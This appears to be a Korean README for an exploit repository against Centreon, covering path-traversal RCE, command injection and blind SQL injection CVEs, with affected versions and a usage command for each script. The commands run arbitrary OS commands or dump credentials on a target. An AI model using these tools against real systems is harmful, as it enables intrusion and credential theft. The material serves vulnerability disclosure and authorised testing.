
# Centreon 익스플로잇 CVE-2026-2749, CVE-2026-2751 및 CVE-2026-2750
이 저장소에는 Centreon의 CVE-2026-2749, CVE-2026-2751 및 CVE-2026-2750에 대한 익스플로잇이 포함되어 있으며, 경로 탐색(Path Traversal), SQL 인젝션 및 명령 주입 취약점을 악용합니다.
25.10 이전의 모든 버전
24.10
24.04
경로 탐색을 통한 RCE — Open Tickets 업로드의 경로 탐색을 통한 임의 파일 쓰기로, 원격 코드 실행으로 이어집니다.
사용법:
$ python3 CVE-2026-2749/pathtraversal_rce.py --url http://target/centreon --cookie PHPSESSID --cmd "id"

CLAPI generatetraps를 통한 명령 주입 — CLAPI generatetraps의 passthru()를 통한 OS 명령 주입.
사용법:
$ python3 CVE-2026-2750/cmdi_rce.py --url http://target/centreon --cookie PHPSESSID --cmd "id"

배열 키를 통한 블라인드 SQL 인젝션 — Service Dependencies의 비정화 배열 키를 통한 블라인드 SQL 인젝션으로, 자격 증명 덤프가 가능합니다.
사용법:
$ python3 CVE-2026-2751/sqli_dump.py --url http://target/centreon --cookie PHPSESSID

이 도구는 교육 및 연구 목적으로만 사용됩니다. 소유한 시스템이나 테스트 권한이 명시적으로 부여된 시스템에서만 사용하십시오. 작성자는 이 프로그램으로 인해 발생하는 오용이나 손해에 대해 책임을 지지 않습니다.
QuimeraX Intelligence는 복잡한 시스템의 중요 취약점 식별에 특화된 고급 EASM 및 사이버 위협 인텔리전스 플랫폼입니다. 이 플랫폼은 보안 위협을 사전에 모니터링, 탐지 및 고객에게 알려 투명성과 잠재적 위험에 대한 신속한 대응을 보장합니다. 고객은 시스템이 취약한 것으로 확인되면 즉각적인 알림과 포괄적인 보고서를 받아 보호 조치를 취할 수 있습니다. 자세히 알아보기
Hakai Security는 보안 전문가들이 설립한 사이버 보안 회사로, 기술적 우수성에 전념합니다. 고급 침투 테스트, 현실적인 레드 팀 시뮬레이션, 안전한 개발 관행을 포함한 맞춤형 보안 솔루션을 제공하여 진화하는 사이버 위협으로부터 고객의 자산을 사전에 보호합니다.